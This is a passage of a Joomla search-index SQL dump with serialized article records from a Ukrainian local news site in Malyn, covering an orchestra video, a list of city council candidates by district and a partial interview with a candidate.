'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2482\";s:5:\"alias\";s:49:\"orkestr-malin-korotka-istoriya-arkhivni-materiali\";s:7:\"summary\";s:297:\"	<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/EI-F93_yZ2Q\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"134\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-17 08:01:42\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:10:\"Відео\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:54:\"2482:orkestr-malin-korotka-istoriya-arkhivni-materiali\";s:7:\"catslug\";s:9:\"134:video\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:71:\"/index.php/video/2482-orkestr-malin-korotka-istoriya-arkhivni-materiali\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Відео\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Відео\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2482\";s:5:\"route\";s:109:\"index.php?option=com_content&view=article&id=2482:orkestr-malin-korotka-istoriya-arkhivni-materiali&catid=134\";s:5:\"title\";s:95:\"Оркестр \"Малин\"- коротка історія ( архівні матеріали)\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-17 07:55:07\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-17 07:55:07\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4732,'index.php?option=com_content&view=article&id=2476','index.php?option=com_content&view=article&id=2476:spisok-kandidativ-u-deputati-do-malinskoji-miskoji-radi-po-okrugakh&catid=8','Список кандидатів у депутати до Малинської міської ради по округах',' Кандидати в депутати до Малинської міської ради від Малинської міської організації ПАРТІЇ «ЄС» ВИБОРЧИЙ ОКРУГ № 1 1. Будник Марія Миколаївна 2. Хоменко Віктор Васильович 3. Єнько Валентина Миколаївна 4. Прокопчук Валерій Володимирович 5. Карпенко Світлана Леонідівна 6. Коломійчук Олександра Миколаївна 7. Петренко Павло Петрович 8. Гончар Василь Васильович 9. Федьович Іван Володимирович 10. Заречна Лілія Володимирівна 11. Кравець Леонід Петрович ВИБОРЧИЙ ОКРУГ № 2 1. Кудрицька Ольга Василівна 2. Мельник Олег Васильович 3. Пустовойтенко Олександр Валентинович 4. Філоненко Олександр Петрович 5. Галицька Світлана Петрівна 6. Гладких Олександр Васильович 7. Хоменко Дмитро Васильович 8. Черняк Артем Борисович 9. Онопрійчук Наталія Володимирівна 10. Дідківська Наталія Григорівна 11. Осадчий Олександр Володимирович ВИБОРЧИЙ ОКРУГ № 3 1. Малегус Ігор Євгенович 2. Раєць Ігор Васильович 3. Мазур Микола Євгенович 4. Степанець Марина Іанівна 5. Гостін Надія Геннадіївна 6. Лось Павло Віталійович ВИБОРЧИЙ ОКРУГ № 4 1. Марек ІгорСтаніславович 2. Марченко Лариса Миколаївна 3. Ничипоренко Руслана Василівна 4. Комарчук Василь Анатолійович 5. Нікітіна Валентина Броніславівна ','2020-10-24 08:15:57','0c4e219c9b4dc906400e9d1dd598ddc5',1,1,1,'*','2020-10-10 09:08:37','0000-00-00 00:00:00','2020-10-10 09:08:37','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2476\";s:5:\"alias\";s:67:\"spisok-kandidativ-u-deputati-do-malinskoji-miskoji-radi-po-okrugakh\";s:7:\"summary\";s:6054:\"<!--StartFragment--><p><strong><span style=\"color: rgb(85, 57, 130); font-family: Verdana, Geneva;\"><em>&nbsp;&nbsp;&nbsp;&nbsp;<span style=\"font-size: 20px;\">Кандидати в депутати до Малинської міської ради від Малинської міської організації ПАРТІЇ «ЄС»</span></em></span></strong></p><p><strong><span style=\"color: #553982; font-family: Verdana, Geneva;\">ВИБОРЧИЙ ОКРУГ № 1</span></strong></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\">  1. Будник Марія Миколаївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 2. Хоменко Віктор Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 3. Єнько Валентина Миколаївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 4. Прокопчук Валерій Володимирович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 5. Карпенко Світлана Леонідівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 6. Коломійчук Олександра Миколаївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 7. Петренко Павло Петрович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 8. Гончар Василь Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 9. Федьович Іван Володимирович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 10. Заречна Лілія Володимирівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 11. Кравець Леонід Петрович</span></p><p><strong><span style=\"color: #553982; font-family: Verdana, Geneva;\">ВИБОРЧИЙ ОКРУГ № 2</span></strong></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\">  1. Кудрицька Ольга Василівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 2. Мельник Олег  Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 3. Пустовойтенко Олександр Валентинович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 4. Філоненко Олександр Петрович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 5. Галицька Світлана Петрівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 6. Гладких Олександр Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 7. Хоменко Дмитро Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 8. Черняк Артем Борисович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 9. Онопрійчук Наталія Володимирівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 10. Дідківська Наталія Григорівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 11. Осадчий Олександр Володимирович</span></p><p><strong><span style=\"color: #553982; font-family: Verdana, Geneva;\">ВИБОРЧИЙ ОКРУГ № 3</span></strong></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\">  1. Малегус Ігор Євгенович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 2. Раєць Ігор Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 3. Мазур Микола Євгенович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 4. Степанець Марина Іанівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 5. Гостін Надія Геннадіївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 6. Лось Павло Віталійович</span></p><p><strong><span style=\"color: #553982; font-family: Verdana, Geneva;\">ВИБОРЧИЙ ОКРУГ № 4</span></strong></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\">  1. Марек Ігор Станіславович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 2. Марченко Лариса Миколаївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 3. Ничипоренко Руслана Василівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 4. Комарчук Василь Анатолійович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 5. Нікітіна Валентина Броніславівна</span></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-10-24 05:15:57\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:2:\"14\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:72:\"2476:spisok-kandidativ-u-deputati-do-malinskoji-miskoji-radi-po-okrugakh\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:94:\"/index.php/8-novini-2/2476-spisok-kandidativ-u-deputati-do-malinskoji-miskoji-radi-po-okrugakh\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2476\";s:5:\"route\";s:125:\"index.php?option=com_content&view=article&id=2476:spisok-kandidativ-u-deputati-do-malinskoji-miskoji-radi-po-okrugakh&catid=8\";s:5:\"title\";s:123:\"Список кандидатів у депутати до Малинської міської ради по округах\";s:11:\"description\";s:2119:\" Кандидати в депутати до Малинської міської ради від Малинської міської організації ПАРТІЇ «ЄС» ВИБОРЧИЙ ОКРУГ № 1 1. Будник Марія Миколаївна 2. Хоменко Віктор Васильович 3. Єнько Валентина Миколаївна 4. Прокопчук Валерій Володимирович 5. Карпенко Світлана Леонідівна 6. Коломійчук Олександра Миколаївна 7. Петренко Павло Петрович 8. Гончар Василь Васильович 9. Федьович Іван Володимирович 10. Заречна Лілія Володимирівна 11. Кравець Леонід Петрович ВИБОРЧИЙ ОКРУГ № 2 1. Кудрицька Ольга Василівна 2. Мельник Олег Васильович 3. Пустовойтенко Олександр Валентинович 4. Філоненко Олександр Петрович 5. Галицька Світлана Петрівна 6. Гладких Олександр Васильович 7. Хоменко Дмитро Васильович 8. Черняк Артем Борисович 9. Онопрійчук Наталія Володимирівна 10. Дідківська Наталія Григорівна 11. Осадчий Олександр Володимирович ВИБОРЧИЙ ОКРУГ № 3 1. Малегус Ігор Євгенович 2. Раєць Ігор Васильович 3. Мазур Микола Євгенович 4. Степанець Марина Іанівна 5. Гостін Надія Геннадіївна 6. Лось Павло Віталійович ВИБОРЧИЙ ОКРУГ № 4 1. Марек ІгорСтаніславович 2. Марченко Лариса Миколаївна 3. Ничипоренко Руслана Василівна 4. Комарчук Василь Анатолійович 5. Нікітіна Валентина Броніславівна \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-10-10 09:08:37\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-10-10 09:08:37\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4734,'index.php?option=com_content&view=article&id=2483','index.php?option=com_content&view=article&id=2483:mariya-nasikanova-ya-ne-zbirayus-piaritis-na-porozhnikh-obitsyankakh-a-pratsyuvati-tak-shchob-lyudi-u-malinskij-gromadi-pochuvalis-zakhishchenimi&catid=8','Марія Насіканова: «Я не збираюсь піаритись на порожніх обіцянках, а працювати так, щоб люди у малинській громаді почувались захищеними»',' Представляємо вам кандидата у депутати Малинської міської ради голову малинської організації партії «Європейська солідарність» Марію Насіканову. —Маріє Іванівно, нинішні вибори до органів місцевого самоврядування дуже відповідальні. У суспільства визрів запит на людей із досвідом у виробничій та управлінській сферах. Наскільки мені відомо, у Вас такого досвіду достатньо. —Так, із 39-ти років трудового стажу маю десять років педагогічного, весь інший час працювала в органах місцевого самоврядування — десять років головою сільської ради, затим в районній раді на різних посадах. Кожен день доводилось працювати з людьми, перейматись їхніми проблемами і щоразу вирішувати безліч питань. — Ви балотуєтесь у депутати обласної і міської ради? —Більше хочу пройти у міську раду, а дорогу в обласну дати молодим енергійним людям. У нас є такі кандидати. — Чому віддаєте перевагу депутатству в міській раді? — У першу чергу, хочу відстоювати права села. Ще й досі немає закону про старостинські округи, які не сформовані. Коли глибше аналізуєш ситуацію, складається враження, що заразвідбувається узурпація влади. Людей позбавили права самим обирати старосту села. Його будуть призначати. А це значить, що він не зможе відстоювати інтереси громади, проявляти власну ініціативу. Він буде маріонеткою або ж залежним від голови міської ради. Якщо староста комусь не сподобається, знайдеться тисячу причин його замінити на більш вигідну кандидатуру. Добре, аби старостою обирали місцевих. Місцева людина буде в курсі всіх справ сельчан, знатиме про потреби не тільки всієї громади, а й чи не кожної родини, кожної людини. Саме страшне в тому, що на посаду старости може потрапити стороння людина, якій байдуже доля селян. — А як фінансуватимуться сільські громади? Кошти, наскільки розумію, тепер будуть на рахунку малинської громади. Чи перепадатиме щось селу на вирішення найнеобхідніших проблем? ','2020-10-24 08:21:00','2944a0fce899a8b2acb424293ec35e9a',1,1,1,'*','2020-10-19 12:09:17','0000-00-00 00:00:00','2020-10-19 12:09:17','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2483\";s:5:\"alias\";s:145:\"mariya-nasikanova-ya-ne-zbirayus-piaritis-na-porozhnikh-obitsyankakh-a-pratsyuvati-tak-shchob-lyudi-u-malinskij-gromadi-pochuvalis-zakhishchenimi\";s:7:\"summary\";s:3796:\"	<p><strong>Представляємо вам кандидата у  депутати Малинської міської ради голову малинської організації партії «Європейська  солідарність» Марію Насіканову.</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp; —Маріє Іванівно, нинішні вибори до органів  місцевого самоврядування дуже відповідальні. У суспільства визрів запит на  людей із досвідом у виробничій та управлінській сферах. Наскільки мені відомо,  у Вас такого досвіду достатньо.</p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/nasik.jpg\"><img src=\"https://malehus.in.ua/images/stories/nasik.jpg\" alt=\"\" class=\"fr-fil\"></a>—Так, із 39-ти років трудового  стажу маю десять років педагогічного, весь інший час працювала в органах  місцевого самоврядування — десять років головою сільської ради, затим в  районній раді на різних посадах. Кожен день доводилось працювати з людьми,  перейматись їхніми проблемами і щоразу вирішувати безліч питань.</p><p>—<strong>Ви  балотуєтесь у депутати обласної і міської ради?</strong></p><p>—Більше хочу пройти у міську раду,  а дорогу в обласну дати молодим енергійним людям. У нас є такі кандидати.</p><p>—  <strong>Чому віддаєте перевагу депутатству в міській раді?</strong></p><p>— У першу чергу, хочу відстоювати  права села. Ще й досі немає закону про старостинські округи, які не сформовані.  Коли глибше аналізуєш ситуацію, складається враження, що зараз відбувається  узурпація влади. Людей позбавили права самим обирати старосту села. Його будуть  призначати. А це значить, що він не зможе відстоювати інтереси громади,  проявляти власну ініціативу. Він буде маріонеткою або ж залежним від голови  міської ради. Якщо староста комусь не сподобається, знайдеться тисячу причин  його замінити на більш вигідну кандидатуру. Добре, аби старостою обирали  місцевих. Місцева людина буде в курсі всіх справ сельчан, знатиме про потреби  не тільки всієї громади, а й чи не кожної родини, кожної людини. Саме страшне в  тому, що на посаду старости може потрапити стороння людина, якій байдуже доля селян.  </p><p>—  <strong>А як фінансуватимуться сільські громади? Кошти, наскільки розумію, тепер будуть  на рахунку малинської громади. Чи перепадатиме щось селу на вирішення найнеобхідніших  проблем?</strong></p>\";s:4:\"body\";s:6370:\"<p>— До реформи кожна людина в селі  знала, що в них є сільський голова, в котрого в помічниках більше десятка місцевих  депутатів. У разі виникнення якоїсь проблеми можна було чекати на її вирішення,  